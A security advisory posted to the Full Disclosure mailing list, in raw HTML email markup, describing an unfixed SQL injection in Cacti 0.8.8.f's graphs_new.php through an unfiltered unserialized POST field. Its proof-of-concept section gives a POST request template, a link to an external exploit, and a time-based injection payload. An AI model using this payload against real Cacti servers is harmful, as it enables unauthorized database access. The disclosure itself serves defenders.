<div style="font:14px/1.5 'Lucida Grande', '微软雅黑';color:#333;"><p
style="font:14px/1.5 'Arial';margin:0;"><span style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif; line-height:
1.5;">==========================</span></p><div
class="mail_quote_E22B806E4DEE4EBFAACCC165AD9FAAE2" style="font: 14px/1.5
'Lucida Grande';color:#333;"><div style="font:14px/1.5 'Lucida Grande',
'微软雅黑';color:#333;"><div style="font-family: 'Lucida Grande', 'Lucida Sans
Unicode', sans-serif !important;">Advisory: Cacti SQL Injection
Vulnerability</div><div style="font-family: 'Lucida Grande', 'Lucida Sans
Unicode', sans-serif !important;">Author: <font color="#0079a5"><a
href="mailto:xiaotian.wang@xxxxxxxxxxxxxxxxxxxx";
title="mailto:xiaotian.wang@xxxxxxxxxxxxxxxxxxxx"; style="text-decoration: none;
color: rgb(19, 109, 186); -webkit-user-drag:
none;">xiaotian.wang@xxxxxxxxxxxxxxxxxxxx</a></font></div><div style="widows:
1; font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;">Affected Version: <font color="#000000"><span
style="font-size: 13px; line-height: normal; background-color: rgb(232, 232,
232);">0.8.8.f</span></font><font face="Lucida Grande, Lucida Sans Unicode,
sans-serif">(the latest version & the older versions)</font></div><div
style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;">Vendor URL: <a href="http://www.cacti.net/";
title="http://www.cacti.net/"; style="text-decoration: none; color: rgb(19, 109,
186); -webkit-user-drag: none; line-height:
1.5;">http://www.cacti.net/</a></div><div style="font-family: 'Lucida Grande',
'Lucida Sans Unicode', sans-serif !important;">Vendor Status: <font
color="#ff2712">Unfixed</font></div><div style="font-family: 'Lucida Grande',
'Lucida Sans Unicode', sans-serif
!important;">==========================</div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif !important;"><div>Vulnerability
Description</div><div>==========================</div><div><font
color="#dd2067">Vulnerable file: /<span style="line-height:
1.5;">cacti/graphs_new.php:</span></font></div><div><p
class="MsoBodyTextFirstIndent" style="text-indent: 0cm;"><span
style="font-size: 10pt; line-height: 20px;">/cacti/graphs_new.php
line:35 <o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height: 16px;">if
(!isset($_REQUEST["action"])) { $_REQUEST["action"] = "";
}<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent" style="text-indent:
16pt;"><span style="font-size: 8pt; line-height: 16px;">switch
($_REQUEST["action"]) {<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height:
16px;"> <span style="color: red;">case
'save':<o:p></o:p></span></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height: 16px;
color:
red;">
form_save(); // highlight 1<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height:
16px;">
break;<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height:
16px;">……<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 24pt;"><span style="font-size: 12pt; line-height: 24px;
color: red;"> </span><font color="#005a7c"><b><span style="text-indent:
24pt; font-size: 12pt; line-height: 24px;">Notice the Highlight
codes</span><span lang="ZH-CN" style="text-indent: 24pt; font-size: 12pt;
line-height: 24px;">,</span><span style="text-indent: 24pt; font-size: 12pt;
line-height: 24px;">track function form_save()</span></b></font></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 0cm;"><span
style="font-size: 10pt; line-height: 20px;">/cacti/graphs_new.php
line:59<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height:
16px;">function <span style="color:
red;">form_save</span>(){<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px;"> </span><span
lang="ZH-CN" style="font-size: 8pt; line-height: 16px;">省略部分代码</span><span
style="font-size: 8pt; line-height: 16px;">……<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px;"> if
(isset($_POST["save_component_new_graphs"])) {<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height:
16px;"> <span
style="color: red;">host_new_graphs_save(); //highlight
2<o:p></o:p></span></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height:
16px;">
header("Location: graphs_new.php?host_id=" .
$_POST["host_id"]);<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height:
16px;">……<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 24pt;"><span style="font-size: 12pt; line-height:
24px;"><font color="#005a7c"><b>Track function
host_new_graphs_save()</b></font></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 0cm;"><span style="font-size: 10pt; line-height:
20px;">/cacti/graphs_new.php line:126<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146, 60);">function
host_new_graphs_save() {<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height: 16px;
color: rgb(118, 146, 60);"> </span><span style="font-size:
8pt; line-height: 16px; color: rgb(192, 80, 77);">$selected_graphs_array =
unserialize(stripslashes($_POST["selected_graphs_array"])); //</span><span
style="font-size: 8pt; line-height: 16px; color: red;">just unserialize,no
filter<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height: 16px;
color: rgb(118, 146, 60);"> /* form an array that contains all of
the data on the previous form */<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
……<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent" style="text-indent:
16pt;"><span style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);"> debug_log_clear("new_graphs");<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);"> while (list($form_type, </span><span style="font-size:
8pt; line-height: 16px; color: red;">$form_array</span><span style="font-size:
8pt; line-height: 16px; color: rgb(118, 146, 60);">) = each(</span><span
style="font-size: 8pt; line-height: 16px; color:
red;">$selected_graphs_array</span><span style="font-size: 8pt; line-height:
16px; color: rgb(118, 146, 60);">)) {<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
$current_form_type = $form_type;<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
while (list($form_id1, </span><span style="font-size: 8pt; line-height:
16px; color: red;">$form_array2</span><span style="font-size: 8pt; line-height:
16px; color: rgb(118, 146, 60);">) = each(</span><span style="font-size: 8pt;
line-height: 16px; color: red;">$form_array</span><span style="font-size: 8pt;
line-height: 16px; color: rgb(118, 146, 60);">)) {<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
/* enumerate information from the arrays stored in post variables
*/<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent" style="text-indent:
16pt;"><span style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
if ($form_type == "cg") {<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
$graph_template_id = $form_id1;<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
}elseif ($form_type == "sg") {<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
while (list(</span><span style="font-size: 8pt; line-height: 16px; color:
red;">$form_id2</span><span style="font-size: 8pt; line-height: 16px; color:
rgb(118, 146, 60);">, $form_array3) = each(</span><span style="font-size: 8pt;
line-height: 16px; color: red;">$form_array2</span><span style="font-size: 8pt;
line-height: 16px; color: rgb(118, 146, 60);">)) {<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
$snmp_index_array = $form_array3;<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
$snmp_query_array["snmp_query_id"] = $form_id1;<o:p></o:p></span></p><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
$snmp_query_array["snmp_index_on"] =
get_best_data_query_index_type($_POST["host_id"],
$form_id1);<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height: 16px;
color: rgb(118, 146,
60);"> </span><span
style="font-size: 8pt; line-height: 16px; color:
red;">$snmp_query_array["snmp_query_graph_id"] = $form_id2</span><span
style="font-size: 8pt; line-height: 16px; color: rgb(118, 146, 60);">;
//highlight 3<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent"
style="text-indent: 16pt;"><span style="font-size: 8pt; line-height: 16px;
color: rgb(118, 146,
60);">
}<o:p></o:p></span></p><p class="MsoBodyTextFirstIndent" style="text-indent:
16pt;"><span style="font-size: 8pt; line-height: 16px; color: rgb(118, 146,
60);">
$graph_template_id = </span><span style="font-size: 8pt; line-height:
16px; color: red;">db_fetch_cell</span><span style="font-size: 8pt;
line-height: 16px; color: rgb(118, 146, 60);">("select graph_template_id from
snmp_query_graph where</span><span style="font-size: 8pt; line-height: 16px;
color: red;"> id=" . $snmp_query_array["snmp_query_graph_id"]); //no
filter, cause a sql injection.<o:p></o:p></span></p></div><div><p
class="MsoBodyTextFirstIndent" style="text-indent: 16pt;"><span
style="font-size: 18px;"><font color="#003c52">Notice that
variable $selected_graphs_array just unserialized the POST variable which
we can control without filter. Then the variable goes into a <span
style="line-height: 20px; widows: 1;"> </span><a target="_blank"
hidefocus="true"
href="http://www.baidu.com/link?url=vhTzEqeVpepj7tjBUTmfXpIqFhO-bfRm2MuL34Wzj_8EkSpTit2xWwEvF82RBNvGIBJ8bfEdixgEdBwVKVGjW9r7Uig-VdJZqNJqfIpiKkmB-4o1CoW_QUMg3D_ZK5SH";
title="http://www.baidu.com/link?url=vhTzEqeVpepj7tjBUTmfXpIqFhO-bfRm2MuL34Wzj_8EkSpTit2xWwEvF82RBNvGIBJ8bfEdixgEdBwVKVGjW9r7Uig-VdJZqNJqfIpiKkmB-4o1CoW_QUMg3D_ZK5SH";
style="text-decoration: none; color: rgb(19, 109, 186); -webkit-user-drag:
none; line-height: 20px; widows: 1;">three-dimensional array</a> , and
finally the dirty data we can control enter into the select database query,
which caused a </font><font color="#a8184b">SQL injection</font><font
color="#003c52">.</font></span></p></div></div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif
!important;">==========================</div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif !important;">POC &&
EXP</div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode',
sans-serif !important;">==========================</div><div
style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;">1. Login</div><div style="font-family: 'Lucida Grande', 'Lucida
Sans Unicode', sans-serif !important;">2. POST <a
href="http://target/cacti/graphs_new.php";
title="http://target/cacti/graphs_new.php"; style="text-decoration: none; color:
rgb(19, 109, 186); -webkit-user-drag:
none;">http://target/cacti/graphs_new.php</a></div><div style="font-family:
'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">
Data:
__csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]</div><div
style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;"><span class="Apple-tab-span" style="white-space: pre;">
</span>{Injection exp can be found on my server: <a
href="http://pandas.pw/cacti.exp"; title="http://pandas.pw/cacti.exp";
style="text-decoration: none; color: rgb(19, 109, 186); -webkit-user-drag:
none;">http://pandas.pw/cacti.exp</a>}</div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif !important;">3. mysql log: select
graph_template_id from snmp_query_graph where id=1 and
benchmark(20000000,sha1(1))--</div><div style="font-family: 'Lucida Grande',
'Lucida Sans Unicode', sans-serif
!important;">====================</div></div></div></div>Attachment:
cacti sqli(1).txt
Description: Binary data
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/